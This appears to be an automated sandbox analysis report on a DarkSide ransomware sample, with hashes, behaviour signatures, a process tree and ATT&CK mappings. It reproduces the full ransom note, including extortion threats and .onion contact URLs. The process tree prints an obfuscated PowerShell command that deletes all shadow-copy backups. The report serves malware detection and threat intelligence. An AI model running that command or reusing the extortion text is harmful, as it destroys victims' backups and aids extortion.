Resubmissions

27-01-2024 19:37

240127-yb5pksafd3 10

27-01-2024 19:36

240127-ybqwesafc2 10

12-05-2021 15:56

210512-db4t7vmwas 10

Analysis

  • max time kernel
    120s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    27-01-2024 19:36

General

  • Target

    68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe

  • Size

    59KB

  • MD5

    9e779da82d86bcd4cc43ab29f929f73f

  • SHA1

    e6b47869caa776840ab79856b04096152103c71d

  • SHA256

    68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7

  • SHA512

    e0a172b862054b63c26e8852019cbd46b68c6102e4bae802ba851ae950798d336295795c0cc5d68002a0467c62e5800f1ecfdae05de2709d57bcc31375276bb7

  • SSDEEP

    768:vjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1ylzrQ/8P+hY23W58:0x7Fu4/ihrhDTV1ylzrzPdZ58

Malware Config

Extracted

Path

C:\Users\Admin\README.d4f081ca.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 30GB data. These files include: - Accounting - Finance - Internal documents - Insurance Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/88/EbDyhFDs_z2hYxVR0XHv4S3ZzHUrKh4rqa3bgZ44Og-ORPgEAgMjzoTDuM46leXv On the page you will find examples of files that have been downloaded. The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/KB0LXKYKN6E96Z7RFYWCEI6NM03TX93VZCL5EDA4IVPXUIQQZBG2ZEG269ZIFSFM When you open our website, put the following data in the input form: Key: 9mMrqcP7meAPxAvXF25ONPJ4KqIozRuGzFKqvsN4XCuThdVZqteuONtPOu4gYqMXcEcWUx5wELPmbMsI2CcmFySRZJDqPLc8rvxUGJg12wuZki8EizCFaG5L8oQTfgOCvMrTkxmSmVhcSjQt340z9fXWhyQzy96XBkwAzIWp5uviJyAZ9ZBKDlodGa6SDkIFdYVlVQi7R9qzQE4G2KqmQ6Tmim4kCalkH4dBxGYkUC1wCyCncUMAWD7egCaKoKGlHiK99ANxmxFulbvoV8vjn2ArqDm46RNzoMk8C9QGpPsPL0GGppW1izBwguSXug4DrPjvvAmZVJzLrGx0LEH8srhneZnfrSLHm2tDwmOog8obV8IMYF41AuvVX1JyzDkhU282ECvBXDBb7URumIHdSnnVOKCVTKmuC1R3srHwxmd6RweVC1IkvHD7Bt7ybXffJVfRkyhMdpXHLREpoWItO1tlQZxvBUKZlrd7hJGSwZSlR3NWx61XMxuptxrXt7ZOHNJ4AkeJ2FvepgCazbuV57FP38CVC4mHsxyBWCDioj4RmEhA0AMn5Z5 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidedxcftmqa.onion/blog/article/id/88/EbDyhFDs_z2hYxVR0XHv4S3ZzHUrKh4rqa3bgZ44Og-ORPgEAgMjzoTDuM46leXv

http://darksidfqzcuhtk2.onion/KB0LXKYKN6E96Z7RFYWCEI6NM03TX93VZCL5EDA4IVPXUIQQZBG2ZEG269ZIFSFM

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Renames multiple (159) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe
    "C:\Users\Admin\AppData\Local\Temp\68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2352
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3008
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1020

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Modify Registry

1
T1112

Credential Access

Unsecured Credentials

1
T1552

Credentials In Files

1
T1552.001

Collection

Data from Local System

1
T1005

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    6b3f38d36b6e8b01e8f8e90e649aad32

    SHA1

    cf22c2f861fb5dfd03f54f87e385507ff7f36dca

    SHA256

    5a28350736eb6c46e2d9d19890ae3d4e5d3b83c01e5bf3322c99f8e28af1faf7

    SHA512

    6b92253a4ef91c0eec74e51bc2db6b7960e2201b70533f172a49af0e877b32fe638a62e277db8556abe27a06bbffe158c39ff41eac95565c0c36d378cffe31ee

  • C:\Users\Admin\AppData\Local\Temp\Cab47EB.tmp
    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Users\Admin\AppData\Local\Temp\Tar480D.tmp
    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    43cb3086ceafcd386437f266387ba17b

    SHA1

    e68aab7cc1a17214fa48800b0a817b9931d389d4

    SHA256

    0007cd193a0ff88fcc6ceba4aa8dbe65fe45d8faa67c525894eac817d6647e20

    SHA512

    1d6e237ad7145e6af3c473bf9534c54922e5d2b7cebaecfaa11cc024b43bcec5c571279b38ee285ba8bf253822b970f6d24f5f5abb5e2b2e0398013ec094e997

  • C:\Users\Admin\README.d4f081ca.TXT
    Filesize

    2KB

    MD5

    15e656071a642f9e91605d74367f7ec7

    SHA1

    ff9da8ec309210e2324dbe4a79d416f90de285c0

    SHA256

    b09cb9d531931fb4725b0e49d85bb81cfc2691ce19ff3567ca0f7b44af6594a1

    SHA512

    c2d948d143863b4a349c992921f442708e5fb7c6226ff264abe1b8d370fb75abb821b09c9f786a19296e183e78e85a2815774728737eff6710bc4578ef8f37de

  • memory/3008-61-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp
    Filesize

    9.6MB

  • memory/3008-60-0x00000000026B0000-0x0000000002730000-memory.dmp
    Filesize

    512KB

  • memory/3008-62-0x00000000026B0000-0x0000000002730000-memory.dmp
    Filesize

    512KB

  • memory/3008-63-0x00000000026B0000-0x0000000002730000-memory.dmp
    Filesize

    512KB

  • memory/3008-64-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp
    Filesize

    9.6MB

  • memory/3008-59-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp
    Filesize

    9.6MB

  • memory/3008-58-0x0000000002560000-0x0000000002568000-memory.dmp
    Filesize

    32KB

  • memory/3008-57-0x000000001B220000-0x000000001B502000-memory.dmp
    Filesize

    2.9MB